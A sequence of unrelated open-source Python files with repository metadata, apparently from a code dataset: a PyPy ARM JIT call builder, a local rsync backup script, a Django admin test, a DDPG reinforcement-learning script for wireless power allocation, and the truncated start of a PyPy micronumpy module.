Python
|
rpython/jit/backend/arm/callbuilder.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 333
|
2015-08-08T18:03:38.000Z
|
2022-03-22T18:13:12.000Z
|
rpython/jit/backend/arm/callbuilder.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 7
|
2020-02-16T16:49:05.000Z
|
2021-11-26T09:00:56.000Z
|
rpython/jit/backend/arm/callbuilder.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 55
|
2015-08-16T02:41:30.000Z
|
2022-03-20T20:33:35.000Z
|
from rpython.rlib.clibffi import FFI_DEFAULT_ABI
from rpython.rlib.objectmodel import we_are_translated
from rpython.jit.metainterp.history import INT, FLOAT, REF
from rpython.jit.backend.arm.arch import WORD
from rpython.jit.backend.arm import registers as r
from rpython.jit.backend.arm import conditions as c
from rpython.jit.backend.arm.locations import RawSPStackLocation
from rpython.jit.backend.arm.jump import remap_frame_layout
from rpython.jit.backend.llsupport.callbuilder import AbstractCallBuilder
from rpython.jit.backend.arm.helper.assembler import count_reg_args
from rpython.jit.backend.arm.helper.assembler import saved_registers
from rpython.jit.backend.arm.helper.regalloc import check_imm_arg
from rpython.jit.backend.arm.codebuilder import OverwritingBuilder
from rpython.jit.backend.llsupport import llerrno
from rpython.rtyper.lltypesystem import rffi
class ARMCallbuilder(AbstractCallBuilder):
def __init__(self, assembler, fnloc, arglocs,
resloc=r.r0, restype=INT, ressize=WORD, ressigned=True):
AbstractCallBuilder.__init__(self, assembler, fnloc, arglocs,
resloc, restype, ressize)
self.current_sp = 0
def push_gcmap(self):
assert not self.is_call_release_gil
# we push *now* the gcmap, describing the status of GC registers
# after the rearrangements done just above, ignoring the return
# value eax, if necessary
noregs = self.asm.cpu.gc_ll_descr.is_shadow_stack()
gcmap = self.asm._regalloc.get_gcmap([r.r0], noregs=noregs)
self.asm.push_gcmap(self.mc, gcmap, store=True)
def pop_gcmap(self):
self.asm._reload_frame_if_necessary(self.mc)
self.asm.pop_gcmap(self.mc)
def emit_raw_call(self):
#the actual call
if self.fnloc.is_imm():
self.mc.BL(self.fnloc.value)
return
# --self.fnloc.is_stack() is always remapped to r4 here
assert self.fnloc.is_core_reg()
self.mc.BLX(self.fnloc.value)
def restore_stack_pointer(self):
# readjust the sp in case we passed some args on the stack
assert self.current_sp % 8 == 0 # sanity check
if self.current_sp != 0:
self._adjust_sp(self.current_sp)
self.current_sp = 0
def _push_stack_args(self, stack_args, on_stack):
assert on_stack % 8 == 0
if on_stack == 0:
return
self._adjust_sp(-on_stack)
self.current_sp = on_stack
ofs = 0
for i, arg in enumerate(stack_args):
if arg is not None:
sp_loc = RawSPStackLocation(ofs, arg.type)
self.asm.regalloc_mov(arg, sp_loc)
ofs += sp_loc.width
else: # alignment word
ofs += WORD
def _adjust_sp(self, n):
# adjust the current stack pointer by n bytes
if n > 0:
if check_imm_arg(n):
self.mc.ADD_ri(r.sp.value, r.sp.value, n)
else:
self.mc.gen_load_int(r.ip.value, n)
self.mc.ADD_rr(r.sp.value, r.sp.value, r.ip.value)
elif n < 0:
n = abs(n)
if check_imm_arg(n):
self.mc.SUB_ri(r.sp.value, r.sp.value, n)
else:
self.mc.gen_load_int(r.ip.value, n)
self.mc.SUB_rr(r.sp.value, r.sp.value, r.ip.value)
def call_releasegil_addr_and_move_real_arguments(self, fastgil):
assert self.is_call_release_gil
assert not self.asm._is_asmgcc()
# Save this thread's shadowstack pointer into r7, for later comparison
gcrootmap = self.asm.cpu.gc_ll_descr.gcrootmap
if gcrootmap:
rst = gcrootmap.get_root_stack_top_addr()
self.mc.gen_load_int(r.r5.value, rst)
self.mc.LDR_ri(r.r7.value, r.r5.value)
# change 'rpy_fastgil' to 0 (it should be non-zero right now)
if self.asm.cpu.cpuinfo.arch_version >= 7:
self.mc.DMB()
self.mc.gen_load_int(r.r6.value, fastgil)
self.mc.LDR_ri(r.r8.value, r.r6.value) # => our thread ident
self.mc.MOV_ri(r.ip.value, 0)
self.mc.STR_ri(r.ip.value, r.r6.value)
if not we_are_translated(): # for testing: we should not access
self.mc.ADD_ri(r.fp.value, r.fp.value, 1) # fp any more
def move_real_result_and_call_reacqgil_addr(self, fastgil):
# try to reacquire the lock. The registers r5 to r7 are still
# valid from before the call:
# r5 == &root_stack_top
# r6 == fastgil
# r7 == previous value of root_stack_top
# r8 == our thread ident
self.mc.LDREX(r.r3.value, r.r6.value) # load the lock value
self.mc.CMP_ri(r.r3.value, 0) # is the lock free?
self.mc.STREX(r.r3.value, r.r8.value, r.r6.value, c=c.EQ)
# try to claim the lock
self.mc.CMP_ri(r.r3.value, 0, cond=c.EQ) # did this succeed?
if self.asm.cpu.cpuinfo.arch_version >= 7:
self.mc.DMB()
# the success of the lock acquisition is defined by
# 'EQ is true', or equivalently by 'r3 == 0'.
#
if self.asm.cpu.gc_ll_descr.gcrootmap:
# When doing a call_release_gil with shadowstack, there
# is the risk that the 'rpy_fastgil' was free but the
# current shadowstack can be the one of a different
# thread. So here we check if the shadowstack pointer
# is still the same as before we released the GIL (saved
# in 'r7'), and if not, we fall back to 'reacqgil_addr'.
self.mc.LDR_ri(r.ip.value, r.r5.value, cond=c.EQ)
self.mc.CMP_rr(r.ip.value, r.r7.value, cond=c.EQ)
b1_location = self.mc.currpos()
self.mc.BKPT() # BEQ below
# there are two cases here: either EQ was false from
# the beginning, or EQ was true at first but the CMP
# made it false. In the second case we need to
# release the fastgil here. We know which case it is
# by checking again r3.
self.mc.CMP_ri(r.r3.value, 0)
self.mc.STR_ri(r.r3.value, r.r6.value, cond=c.EQ)
else:
b1_location = self.mc.currpos()
self.mc.BKPT() # BEQ below
#
# save the result we just got
gpr_to_save, vfp_to_save = self.get_result_locs()
with saved_registers(self.mc, gpr_to_save, vfp_to_save):
self.mc.BL(self.asm.reacqgil_addr)
# replace b1_location with B(here, c.EQ)
pmc = OverwritingBuilder(self.mc, b1_location, WORD)
pmc.B_offs(self.mc.currpos(), c.EQ)
if not we_are_translated(): # for testing: now we can accesss
self.mc.SUB_ri(r.fp.value, r.fp.value, 1) # fp again
def get_result_locs(self):
raise NotImplementedError
def _ensure_result_bit_extension(self, resloc, size, signed):
if size == 4:
return
if size == 1:
if not signed: # unsigned char
self.mc.AND_ri(resloc.value, resloc.value, 0xFF)
else:
self.mc.LSL_ri(resloc.value, resloc.value, 24)
self.mc.ASR_ri(resloc.value, resloc.value, 24)
elif size == 2:
if not signed:
self.mc.LSL_ri(resloc.value, resloc.value, 16)
self.mc.LSR_ri(resloc.value, resloc.value, 16)
else:
self.mc.LSL_ri(resloc.value, resloc.value, 16)
self.mc.ASR_ri(resloc.value, resloc.value, 16)
def write_real_errno(self, save_err):
if save_err & rffi.RFFI_READSAVED_ERRNO:
# Just before a call, read '*_errno' and write it into the
# real 'errno'. The r0-r3 registers contain arguments to the
# future call; the r5-r8 registers contain various stuff.
# We still have r9-r12.
if save_err & rffi.RFFI_ALT_ERRNO:
rpy_errno = llerrno.get_alt_errno_offset(self.asm.cpu)
else:
rpy_errno = llerrno.get_rpy_errno_offset(self.asm.cpu)
p_errno = llerrno.get_p_errno_offset(self.asm.cpu)
self.mc.LDR_ri(r.r9.value, r.sp.value,
self.asm.saved_threadlocal_addr + self.current_sp)
self.mc.LDR_ri(r.ip.value, r.r9.value, p_errno)
self.mc.LDR_ri(r.r9.value, r.r9.value, rpy_errno)
self.mc.STR_ri(r.r9.value, r.ip.value)
elif save_err & rffi.RFFI_ZERO_ERRNO_BEFORE:
# Same, but write zero.
p_errno = llerrno.get_p_errno_offset(self.asm.cpu)
self.mc.LDR_ri(r.r9.value, r.sp.value,
self.asm.saved_threadlocal_addr + self.current_sp)
self.mc.LDR_ri(r.ip.value, r.r9.value, p_errno)
self.mc.MOV_ri(r.r9.value, 0)
self.mc.STR_ri(r.r9.value, r.ip.value)
def read_real_errno(self, save_err):
if save_err & rffi.RFFI_SAVE_ERRNO:
# Just after a call, read the real 'errno' and save a copy of
# it inside our thread-local '*_errno'. Registers r9-r12
# are unused here, and registers r2-r3 never contain anything
# after the call.
if save_err & rffi.RFFI_ALT_ERRNO:
rpy_errno = llerrno.get_alt_errno_offset(self.asm.cpu)
else:
rpy_errno = llerrno.get_rpy_errno_offset(self.asm.cpu)
p_errno = llerrno.get_p_errno_offset(self.asm.cpu)
self.mc.LDR_ri(r.r3.value, r.sp.value,
self.asm.saved_threadlocal_addr)
self.mc.LDR_ri(r.ip.value, r.r3.value, p_errno)
self.mc.LDR_ri(r.ip.value, r.ip.value, 0)
self.mc.STR_ri(r.ip.value, r.r3.value, rpy_errno)
class SoftFloatCallBuilder(ARMCallbuilder):
# XXX Maybe we could kill this class and unify the remaining two
# XXX classes, by carefully checking if all methods here are doing
# XXX the exact same thing as the methods from HardFloatCallBuilder,
# XXX but simply forcing all BoxFloat arguments to be longlongs
# XXX (i.e. ignoring 'f' in favour of 'L'), and the same with
# XXX single-float arguments (ignoring 'S' in favour of 'i');
# XXX and the same for the return value.
def get_result_locs(self):
if self.resloc is None:
return [], []
if self.resloc.is_vfp_reg():
return [r.r0, r.r1], []
assert self.resloc.is_core_reg()
return [r.r0], []
def load_result(self):
# ensure the result is wellformed and stored in the correct location
resloc = self.resloc
if resloc is None:
return
if resloc.is_vfp_reg():
# move result to the allocated register
self.asm.mov_to_vfp_loc(r.r0, r.r1, resloc)
elif resloc.is_core_reg():
# move result to the allocated register
if resloc is not r.r0:
self.asm.mov_loc_loc(r.r0, resloc)
self._ensure_result_bit_extension(resloc,
self.ressize, self.ressign)
def _collect_and_push_stack_args(self, arglocs):
n_args = len(arglocs)
reg_args = count_reg_args(arglocs)
# all arguments past the 4th go on the stack
# first we need to prepare the list so it stays aligned
stack_args = []
count = 0
on_stack = 0
if n_args > reg_args:
for i in range(reg_args, n_args):
arg = arglocs[i]
if arg.type != FLOAT:
count += 1
on_stack += 1
else:
on_stack += 2
if count % 2 != 0:
stack_args.append(None)
count = 0
on_stack += 1
stack_args.append(arg)
if count % 2 != 0:
on_stack += 1
stack_args.append(None)
if on_stack > 0:
self._push_stack_args(stack_args, on_stack*WORD)
def prepare_arguments(self):
arglocs = self.arglocs
reg_args = count_reg_args(arglocs)
self._collect_and_push_stack_args(arglocs)
# collect variables that need to go in registers and the registers they
# will be stored in
num = 0
count = 0
non_float_locs = []
non_float_regs = []
float_locs = []
for i in range(reg_args):
arg = arglocs[i]
if arg.type == FLOAT and count % 2 != 0:
num += 1
count = 0
reg = r.caller_resp[num]
if arg.type == FLOAT:
float_locs.append((arg, reg))
else:
non_float_locs.append(arg)
non_float_regs.append(reg)
if arg.type == FLOAT:
num += 2
else:
num += 1
count += 1
# Check that the address of the function we want to call is not
# currently stored in one of the registers used to pass the arguments
# or on the stack, which we can not access later
# If this happens to be the case we remap the register to r4 and use r4
# to call the function
if not self.fnloc.is_imm():
non_float_locs.append(self.fnloc)
non_float_regs.append(r.r4)
self.fnloc = r.r4
# remap values stored in core registers
remap_frame_layout(self.asm, non_float_locs, non_float_regs, r.ip)
for loc, reg in float_locs:
self.asm.mov_from_vfp_loc(loc, reg, r.all_regs[reg.value + 1])
class HardFloatCallBuilder(ARMCallbuilder):
next_arg_vfp = 0
next_arg_svfp = 0
def get_next_vfp(self, tp):
assert tp in 'fS'
if tp == 'f':
# 64bit double
i = max(self.next_arg_vfp, (self.next_arg_svfp + 1) >> 1)
if i >= len(r.vfp_argument_regs):
self.next_arg_svfp = 1000 # stop that sequence too
return None
self.next_arg_vfp = i + 1
return r.vfp_argument_regs[i]
else:
# 32bit float
i = self.next_arg_svfp
if not (i & 1): # if i is even
i = max(i, self.next_arg_vfp << 1)
if i >= len(r.svfp_argument_regs):
return None
self.next_arg_svfp = i + 1
return r.svfp_argument_regs[i]
def prepare_arguments(self):
non_float_locs = []
non_float_regs = []
float_locs = []
float_regs = []
stack_args = []
singlefloats = None
longlong_mask = 0
arglocs = self.arglocs
argtypes = self.argtypes
r_register_count = 0
on_stack = 0
for i in range(len(arglocs)):
argtype = INT
if i < len(argtypes) and argtypes[i] == 'S':
argtype = argtypes[i]
arg = arglocs[i]
if arg.is_float():
if i < len(argtypes) and argtypes[i] == 'L':
# A longlong argument. It uses two regular argument
# positions, but aligned to an even number. This is
# a bit strange, but it is the case even for registers:
# it can be in r0-r1 or in r2-r3 but not in r1-r2.
assert arg.is_float()
if r_register_count == 0:
# will temporarily load the register into d8
float_locs.append(arg)
float_regs.append(r.d8)
longlong_mask |= 1
r_register_count = 2
continue
elif r_register_count <= 2:
# will temporarily load the register into d9
float_locs.append(arg)
float_regs.append(r.d9)
longlong_mask |= 2
r_register_count = 4
continue
elif r_register_count == 3:
r_register_count = 4
else:
# A 64-bit float argument. Goes into the next free v#
# register, or if none, to the stack aligned to an
# even number of words.
argtype = FLOAT
reg = self.get_next_vfp(argtype)
if reg:
float_locs.append(arg)
assert reg not in float_regs
float_regs.append(reg)
continue
# float or longlong argument that needs to go on the stack
if on_stack & 1: # odd: realign
stack_args.append(None)
on_stack += 1
stack_args.append(arg)
on_stack += 2
elif argtype == 'S':
# Singlefloat (32-bit) argument. Goes into the next free
# v# register, or if none, to the stack in a single word.
if singlefloats is None:
singlefloats = []
tgt = self.get_next_vfp(argtype)
if tgt:
singlefloats.append((arg, tgt))
else: # Singlefloat argument that needs to go on the stack
# treated the same as a regular core register argument
stack_args.append(arg)
on_stack += 1
else:
# Regular one-word argument. Goes into the next register
# free from the list r0, r1, r2, r3, or to the stack.
if r_register_count < len(r.argument_regs):
reg = r.argument_regs[r_register_count]
r_register_count += 1
non_float_locs.append(arg)
non_float_regs.append(reg)
else: # non-float argument that needs to go on the stack
stack_args.append(arg)
on_stack += 1
# align the stack
if on_stack & 1: # odd: realign
stack_args.append(None)
on_stack += 1
self._push_stack_args(stack_args, on_stack*WORD)
# Check that the address of the function we want to call is not
# currently stored in one of the registers used to pass the arguments
# or on the stack, which we can not access later
# If this happens to be the case we remap the register to r4 and use r4
# to call the function
if not self.fnloc.is_imm():
non_float_locs.append(self.fnloc)
non_float_regs.append(r.r4)
self.fnloc = r.r4
# remap values stored in vfp registers
remap_frame_layout(self.asm, float_locs, float_regs, r.vfp_ip)
if singlefloats:
for src, dest in singlefloats:
if src.is_float():
assert 0, 'unsupported case'
if src.is_stack():
# use special VLDR for 32bit
self.asm.regalloc_mov(src, r.ip)
src = r.ip
if src.is_imm():
self.mc.gen_load_int(r.ip.value, src.value)
src = r.ip
if src.is_core_reg():
self.mc.VMOV_cs(dest.value, src.value)
# remap values stored in core registers
remap_frame_layout(self.asm, non_float_locs, non_float_regs, r.ip)
if longlong_mask & 1:
self.mc.FMRRD(r.r0.value, r.r1.value, r.d8.value)
if longlong_mask & 2:
self.mc.FMRRD(r.r2.value, r.r3.value, r.d9.value)
def load_result(self):
resloc = self.resloc
if self.restype == 'S':
self.mc.VMOV_sc(resloc.value, r.s0.value)
elif self.restype == 'L':
assert resloc.is_vfp_reg()
self.mc.FMDRR(resloc.value, r.r0.value, r.r1.value)
# ensure the result is wellformed and stored in the correct location
if resloc is not None and resloc.is_core_reg():
self._ensure_result_bit_extension(resloc,
self.ressize, self.ressign)
def get_result_locs(self):
if self.resloc is None:
return [], []
if self.resloc.is_vfp_reg():
if self.restype == 'L': # long long
return [r.r0, r.r1], []
else:
return [], [r.d0]
assert self.resloc.is_core_reg()
return [r.r0], []
def get_callbuilder(cpu, assembler, fnloc, arglocs,
resloc=r.r0, restype=INT, ressize=WORD, ressigned=True):
if cpu.cpuinfo.hf_abi:
return HardFloatCallBuilder(assembler, fnloc, arglocs, resloc,
restype, ressize, ressigned)
else:
return SoftFloatCallBuilder(assembler, fnloc, arglocs, resloc,
restype, ressize, ressigned)
| 42.112205
| 91
| 0.557986
|
58cc66384450fe06963dd83c09796e8a5b958d63
| 1,571
|
py
|
Python
|
files_and_folders/backupper/bk.py
|
Xanderamon/python-IT-automation
|
d07c41a3b3102214631cb35bd73d2a2d315c89dc
|
[
"MIT"
] | null | null | null |
files_and_folders/backupper/bk.py
|
Xanderamon/python-IT-automation
|
d07c41a3b3102214631cb35bd73d2a2d315c89dc
|
[
"MIT"
] | null | null | null |
files_and_folders/backupper/bk.py
|
Xanderamon/python-IT-automation
|
d07c41a3b3102214631cb35bd73d2a2d315c89dc
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import os
import multiprocessing
import subprocess
#In this test /src/ and /dest/ are in the same folder of the script
source = os.path.join(os.getcwd(),"src")
destination = os.path.join(os.getcwd(),"dest")
def get_pathlist(folder):
pathlist = []
#No need for the FULL path of the dir/file
#The source directory is in a global variable
for root,dirs,files in os.walk(folder):
for f in files:
#Extract the sub-folder (if any)
path = root[len(folder):]
#Extract the filename
item = f
#Store the RELATIVE path in a tuple
pathlist.append((path,item))
for d in dirs:
#Extract the sub-folder (if any)
path = root[len(folder):]
#Extract the folder name
item = d
#Store the RELATIVE path in a tuple
pathlist.append((path,item))
#Return the list of tuples
return pathlist
def backup(path):
#Source = root, path[0] = sub-folder, path[1] = file/dir name
#NB: We input the FULL path of the source file/folder
src = os.path.join(source,path[0],path[1])
#Destination = root, path[0] = sub-folder
#NB: We input the destination folder only (no need for the file/folder name)
dest = os.path.join(destination,path[0])
subprocess.call(['rsync', '-azq', src, dest])
if __name__ == "__main__":
src_pathlist = get_pathlist(source)
with multiprocessing.Pool(len(src_pathlist),maxtasksperchild=1) as mpool:
mpool.map(backup,src_pathlist)
| 33.425532
| 80
| 0.630172
|
f2b05a1d36df99e204c9873cfbe89878cb7e1370
| 838
|
py
|
Python
|
cms/apps/pages/tests/test_admin_destructive.py
|
cresset-group/cms
|
727b81e40dd1196e85c240e728a7824121163d4d
|
[
"BSD-3-Clause"
] | 13
|
2015-03-13T21:32:16.000Z
|
2020-08-07T08:09:02.000Z
|
cms/apps/pages/tests/test_admin_destructive.py
|
cresset-group/cms
|
727b81e40dd1196e85c240e728a7824121163d4d
|
[
"BSD-3-Clause"
] | 131
|
2015-04-04T11:27:14.000Z
|
2020-10-16T13:39:16.000Z
|
cms/apps/pages/tests/test_admin_destructive.py
|
cresset-group/cms
|
727b81e40dd1196e85c240e728a7824121163d4d
|
[
"BSD-3-Clause"
] | 16
|
2015-06-05T12:56:28.000Z
|
2021-01-06T15:15:53.000Z
|
import sys
from django.conf import settings
from django.contrib import admin
from django.test import TestCase
from ..models import Country, CountryGroup, Page
class TestArticleAdminBase(TestCase):
def test_article_admin(self):
self.assertNotIn(Country, admin.site._registry)
self.assertNotIn(CountryGroup, admin.site._registry)
with self.settings(MIDDLEWARE=['cms.middleware.LocalisationMiddleware']):
module = sys.modules['cms.apps.pages.admin']
del sys.modules['cms.apps.pages.admin']
admin.site.unregister(Page)
from ..admin import page_admin
assert page_admin
self.assertIn(Country, admin.site._registry)
self.assertIn(CountryGroup, admin.site._registry)
sys.modules['cms.apps.pages.admin'] = module
| 28.896552
| 81
| 0.686158
|
540668a27b948a35e360e525034587d9fcaa1c6d
| 111
|
py
|
Python
|
mocasin/gui/__init__.py
|
tud-ccc/mocasin
|
6cf0a169e24d65d0fc859398f181dd500f928340
|
[
"0BSD"
] | 1
|
2022-03-13T19:27:50.000Z
|
2022-03-13T19:27:50.000Z
|
mocasin/tgff/tgffParser/__init__.py
|
tud-ccc/mocasin
|
6cf0a169e24d65d0fc859398f181dd500f928340
|
[
"0BSD"
] | null | null | null |
mocasin/tgff/tgffParser/__init__.py
|
tud-ccc/mocasin
|
6cf0a169e24d65d0fc859398f181dd500f928340
|
[
"0BSD"
] | null | null | null |
# Copyright (C) 2019 TU Dresden
# Licensed under the ISC license (see LICENSE.txt)
#
# Authors: Felix Teweleit
| 22.2
| 50
| 0.738739
|
274bedadf55aa20c412461ba9d4fc9bb02da6a03
| 8,417
|
py
|
Python
|
special_case.py
|
zhiguo-ding/CRNOMA_DDPG
|
8f7acca0a8b2c176e50c262cb006a0f4a8af37a1
|
[
"MIT"
] | 24
|
2020-12-03T07:54:54.000Z
|
2022-03-27T10:44:16.000Z
|
special_case.py
|
3025066980/CRNOMA_DDPG
|
8f7acca0a8b2c176e50c262cb006a0f4a8af37a1
|
[
"MIT"
] | null | null | null |
special_case.py
|
3025066980/CRNOMA_DDPG
|
8f7acca0a8b2c176e50c262cb006a0f4a8af37a1
|
[
"MIT"
] | 16
|
2020-12-03T13:36:12.000Z
|
2022-03-30T10:49:11.000Z
|
"""
Note: This is based on Mofan's codes from: https://morvanzhou.github.io/tutorials/
Using:
tensorflow 1.0
This code is used to generate the figures for random fading without average (a snapshot).
Simply change K
"""
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import numpy as np
import time
from enviroment import Env_cellular as env
import matplotlib.pyplot as plt
##################### hyper parameters ####################
Pn = 1
K=10 # the number of grant based users
MAX_EPISODES = 400
MAX_EP_STEPS = 100
LR_A = 0.002 # learning rate for actor
LR_C = 0.004 # learning rate for critic
GAMMA = 0.9 # reward discount
TAU = 0.01 # soft replacement
MEMORY_CAPACITY = 10000
BATCH_SIZE = 32
############################### DDPG ####################################
class DDPG(object):
def __init__(self, a_dim, s_dim, a_bound,):
self.memory = np.zeros((MEMORY_CAPACITY, s_dim * 2 + a_dim + 1), dtype=np.float32)
self.pointer = 0
self.sess = tf.Session()
self.a_dim, self.s_dim, self.a_bound = a_dim, s_dim, a_bound,
self.S = tf.placeholder(tf.float32, [None, s_dim], 's')
self.S_ = tf.placeholder(tf.float32, [None, s_dim], 's_')
self.R = tf.placeholder(tf.float32, [None, 1], 'r')
self.a = self._build_a(self.S,)
q = self._build_c(self.S, self.a, )
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='Actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='Critic')
ema = tf.train.ExponentialMovingAverage(decay=1 - TAU) # soft replacement
def ema_getter(getter, name, *args, **kwargs):
return ema.average(getter(name, *args, **kwargs))
target_update = [ema.apply(a_params), ema.apply(c_params)] # soft update operation
a_ = self._build_a(self.S_, reuse=True, custom_getter=ema_getter) # replaced target parameters
q_ = self._build_c(self.S_, a_, reuse=True, custom_getter=ema_getter)
a_loss = - tf.reduce_mean(q) # maximize the q
self.atrain = tf.train.AdamOptimizer(LR_A).minimize(a_loss, var_list=a_params)
with tf.control_dependencies(target_update): # soft replacement happened at here
q_target = self.R + GAMMA * q_
td_error = tf.losses.mean_squared_error(labels=q_target, predictions=q)
self.ctrain = tf.train.AdamOptimizer(LR_C).minimize(td_error, var_list=c_params)
self.sess.run(tf.global_variables_initializer())
def choose_action(self, s):
return self.sess.run(self.a, {self.S: s })[0]
def learn(self):
indices = np.random.choice(min(MEMORY_CAPACITY,self.pointer), size=BATCH_SIZE)
bt = self.memory[indices, :]
bs = bt[:, :self.s_dim]
ba = bt[:, self.s_dim: self.s_dim + self.a_dim]
br = bt[:, -self.s_dim - 1: -self.s_dim]
bs_ = bt[:, -self.s_dim:]
self.sess.run(self.atrain, {self.S: bs})
self.sess.run(self.ctrain, {self.S: bs, self.a: ba, self.R: br, self.S_: bs_})
def store_transition(self, s, a, r, s_):
r = np.reshape(r,(1,1))
a = np.reshape(a,(1,1))
#print(f"state is {s}, action is {a}, reward is {r}, next state is {s_}")
transition = np.hstack((s, a, r, s_))
index = self.pointer % MEMORY_CAPACITY # replace the old memory with new memory
self.memory[index, :] = transition
self.pointer += 1
def _build_a(self, s, reuse=None, custom_getter=None):
trainable = True if reuse is None else False
with tf.variable_scope('Actor', reuse=reuse, custom_getter=custom_getter):
net = tf.layers.dense(s, 64, activation=tf.nn.relu, name='l1', trainable=trainable)
a2 = tf.layers.dense(net, 64, activation=tf.nn.tanh, name='l2', trainable=trainable)
#a3 = tf.layers.dense(a2, 30, activation=tf.nn.tanh, name='l3', trainable=trainable)
a = tf.layers.dense(a2, self.a_dim, activation=tf.nn.tanh, name='a', trainable=trainable)
return tf.multiply(a, self.a_bound, name='scaled_a')
def _build_c(self, s, a, reuse=None, custom_getter=None):
trainable = True if reuse is None else False
with tf.variable_scope('Critic', reuse=reuse, custom_getter=custom_getter):
n_l1 = 64
w1_s = tf.get_variable('w1_s', [self.s_dim, n_l1], trainable=trainable)
w1_a = tf.get_variable('w1_a', [self.a_dim, n_l1], trainable=trainable)
b1 = tf.get_variable('b1', [1, n_l1], trainable=trainable)
net = tf.nn.relu(tf.matmul(s, w1_s) + tf.matmul(a, w1_a) + b1)
net2 = tf.layers.dense(net, 64, activation=tf.nn.relu, name='lx2', trainable=trainable)
#net3 = tf.layers.dense(net2, 30, activation=tf.nn.relu, name='lx3', trainable=trainable)
#not sure about this part
return tf.layers.dense(net2, 1, trainable=trainable) # Q(s,a)
############################### training ####################################
s_dim = 3# dimsion of states
a_dim = 1# dimension of action
a_bound = 1 #bound of action
state_am = 10000
locationspace = np.linspace(1,1000, num=K)
location_vector = np.zeros((K, 2))
location_vector[:,1] = locationspace
location_GF = np.array([[1,1]])# np.ones((1, 2))
##### fading for GB user
hnx1 = np.random.randn(K, 2)
hnx2 = np.random.randn(K, 2)
fading_n = hnx1 ** 2 + hnx2 ** 2
#### fading for GF user
h0x1 = np.random.randn(1, 1)
h0x2 = np.random.randn(1, 1)
fading_0 = h0x1[0,0] ** 2 + h0x2[0,0] ** 2
myenv = env( MAX_EP_STEPS, s_dim, location_vector,location_GF,K,Pn, fading_n, fading_0)
#myenv = env(P0, MAX_EP_STEPS, s_dim, location_vector,location_GF,K)
#myenv = env(P0,MAX_EP_STEPS,s_dim)
ddpg = DDPG(a_dim, s_dim, a_bound)
var = 1 # control exploration
t1 = time.time()
ep_rewardall = []
ep_rewardall_greedy = []
ep_rewardall_random = []
for i in range(MAX_EPISODES):
batter_ini = myenv.reset()
s = myenv.channel_sequence[i%myenv.K,:].tolist()
#s.append(myenv.h0)
s.append(batter_ini)
s = np.reshape(s,(1,s_dim))
s = s*state_am #amplify the state
s_greedy = s
s_random = s
#print(s[0,0:2])
ep_reward = 0
ep_reward_random = 0
ep_reward_greedy = 0
for j in range(MAX_EP_STEPS):
# Add exploration noise
a = ddpg.choose_action(s)
a = np.clip(np.random.normal(a, var), 0, 1) # add randomness to action selection for exploration
r, s_, done = myenv.step(a,s/state_am,j)
s_ = s_ * state_am
ddpg.store_transition(s, a, r, s_)
if var >0.1:
var *= .9998 # decay the action randomness
ddpg.learn()
s = s_
ep_reward += r
##### greedy
r_greedy, s_next_greedy, done = myenv.step_greedy(s_greedy/state_am, j)
s_greedy = s_next_greedy*state_am
ep_reward_greedy += r_greedy
##### random
r_random, s_next_random, done = myenv.step_random(s_random/state_am, j)
s_random = s_next_random*state_am
ep_reward_random += r_random
if j == MAX_EP_STEPS-1:
#print(f"Episode: {i}, reward is {ep_reward}, and Explore is {var}")
print('Episode:', i, ' Reward: %i' % int(ep_reward),' Reward Greedy: %i' % int(ep_reward_greedy),' Reward random: %i' % int(ep_reward_random), 'Explore: %.2f' % var )
#print(myenv.location)
# if ep_reward > -300:RENDER = True
break
ep_reward = np.reshape(ep_reward/MAX_EP_STEPS, (1,))
ep_rewardall.append(ep_reward)
ep_reward_greedy = np.reshape(ep_reward_greedy/MAX_EP_STEPS, (1,))
ep_rewardall_greedy.append(ep_reward_greedy)
ep_reward_random = np.reshape(ep_reward_random/MAX_EP_STEPS, (1,))
ep_rewardall_random.append(ep_reward_random)
#print(s_)
print('Running time: ', time.time() - t1)
print(f"{ep_reward} ")
print(ep_rewardall)
plt.plot(ep_rewardall, "^-", label='DDPG: rewards')
plt.plot(ep_rewardall_greedy, "+:", label='Greedy: rewards')
plt.plot(ep_rewardall_random, "o--", label='Random: rewards')
plt.xlabel("Episode")
plt.ylabel(" Epsiodic Reward - Average Data Rate (NPCU)")
plt.legend( loc=3, ncol=2)
plt.show()
''' Save final results'''
#np.savez_compressed('data_snapshot', ep_rewardall=ep_rewardall, ep_rewardall_greedy=ep_rewardall_greedy, ep_rewardall_random=ep_rewardall_random)
| 38.43379
| 178
| 0.634668
|
bcbb8189e5466f03064f9ba612c54c028e53d20f
| 30,924
|
py
|
Python
|
pypy/module/micronumpy/concrete.py
|
SeraphRoy/PyPy-Functional
|
e825dce7f7c484fa666566974a93ed5d59fb73be
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
pypy/module/micronumpy/concrete.py
|
SeraphRoy/PyPy-Functional
|
e825dce7f7c484fa666566974a93ed5d59fb73be
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
pypy/module/micronumpy/concrete.py
|
SeraphRoy/PyPy-Functional
|
e825dce7f7c484fa666566974a93ed5d59fb73be
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
from pypy.interpreter.error import oefmt
from rpython.rlib import jit, rgc
from rpython.rlib.rarithmetic import ovfcheck
from rpython.rlib.listsort import make_timsort_class
from rpython.rlib.buffer import Buffer
from rpython.rlib.debug import make_sure_not_resized
from rpython.rlib.rstring import StringBuilder
from rpython.rlib.rawstorage import alloc_raw_storage, free_raw_storage, \
raw_storage_getitem, raw_storage_setitem, RAW_STORAGE
from rpython.rtyper.lltypesystem import rffi, lltype, llmemory
from pypy.module.micronumpy import support, loop, constants as NPY
from pypy.module.micronumpy.base import convert_to_array, W_NDimArray, \
ArrayArgumentException, W_NumpyObject
from pypy.module.micronumpy.iterators import ArrayIter
from pypy.module.micronumpy.strides import (
IntegerChunk, SliceChunk, NewAxisChunk, EllipsisChunk, BooleanChunk,
new_view, calc_strides, calc_new_strides, shape_agreement,
